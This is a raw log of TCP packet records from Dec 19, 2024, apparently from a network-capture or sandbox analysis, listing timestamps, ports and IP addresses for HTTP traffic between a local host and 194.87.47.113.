Dec 19, 2024 08:47:23.424648046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.425519943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.425734997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.425869942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.553069115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.553487062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.553656101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.553679943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.606544018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.621481895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.621694088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.621922016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.621993065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.622221947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.622272015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.622492075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.623517990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.623593092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.623857021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.624439955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.624615908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.624627113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.625768900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.625881910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.626143932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.627230883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.627357960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.627585888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.627968073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.628045082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.628325939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.631038904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.631046057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.631123066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.633352041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.633367062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.633424044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.634123087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.634131908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.634202003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.634917974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.634927034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.634987116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.635670900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.635679007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.635776043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.637233019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.637238979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.637355089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.637983084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.637989998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.638107061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.638647079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.638653994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.638763905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.639360905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.639368057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.639427900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.640067101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.640075922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.640116930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.640724897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.640732050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.640786886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.641417027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.641525984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.641736031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.642081976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.642216921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.642416000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.643192053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.643253088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.643371105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.644296885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.644361019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.644467115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.645386934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.645438910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.645567894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.646528959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.646650076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.646675110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.647576094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.647631884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.647763968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.648722887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.648782015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.648900986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.649867058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.649961948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.649967909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.650891066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.650979042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.651128054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.652008057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.652148962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.652189016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.653091908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.653217077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.653285980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.654211998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.654278994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.654414892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.655283928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.655334949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.655596018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.656460047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.656527996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.656590939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.657656908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.657783985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.657799006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.658627033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.658725023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.658792973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.659737110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.659910917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.659930944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.660851955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.661086082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.661132097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.661968946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.662115097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.662223101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.663103104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.663235903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.663254023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.664160013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.664366007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.664393902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.665256023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.665404081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.665467978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.694323063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.694468975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.694469929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.694854975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.694960117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.794044018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.794274092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.794399977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.794548035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.840518951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.840528965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.840593100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.840886116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.841356039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.841423988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.841882944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.842253923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.842328072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.843133926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.843194962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.843318939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.844191074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.844279051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.844611883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.845202923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.845550060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.845853090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.846328974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.846519947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.846643925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.847549915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.847723007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.847883940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.848639965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.848772049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.848862886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.849639893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.849947929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.850040913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.851382971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.852088928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.852161884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.852250099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.852684975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.852755070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.852960110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.853349924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.853431940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.854054928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.854254007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.854393959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.855338097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.855345011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.855418921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.856292009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.856616020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.856676102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.857346058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.857517004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.857623100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.858472109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.858654022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.858741999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.859642982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.859850883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.860047102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.860677958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.860830069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.860882998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.861766100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.861979961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.862111092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.862879038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.863069057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.863140106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.863925934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.864151955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.864214897 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.865042925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.865320921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.865369081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.866226912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.866472960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.866561890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.867321968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.867556095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.867604017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.868391037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.868741989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.868824005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.870299101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.870846033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.871005058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.871031046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.871318102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.871474028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.871643066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.872123003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.872193098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.872814894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.873013973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.873073101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.873985052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.874161959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.874274969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.874979973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.875166893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.875336885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.876086950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.876286030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.876329899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.877242088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.877351046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.877397060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.878323078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.878618956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.878793001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.879410982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.879606962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.879652977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.880544901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.880719900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.880871058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.881612062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.881779909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.881899118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.882761955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.882889986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.882978916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.883830070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.884084940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.884159088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.884886980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.885138988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.885253906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.885986090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.886260033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.886329889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.887100935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.887365103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.887429953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:23.888206005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:23.934638977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.032608986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.032720089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.032805920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.033097982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.044075966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.044090033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.044172049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.044398069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.044481993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.044614077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.044934988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.045109034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.045737982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.046017885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.046058893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.046571016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.046840906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.046885014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.047725916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.047910929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.048011065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.048849106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.049012899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.049062014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.049916029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.050086021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.050174952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.051018000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.051229954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.051309109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.052105904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.052314043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.052391052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.053282022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.053504944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.053577900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.054357052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.054574966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.054636002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.055424929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.055634022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.055706024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.056520939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.056688070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.056736946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.057612896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.057817936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.057874918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.058739901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.058916092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.058984041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.059894085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.060055971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.060159922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.060945988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.061155081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.061202049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.062032938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.062288046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.062350035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.063360929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.063383102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.063553095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.064286947 CET	80	49707	194.87.47.113	192.168.2.7
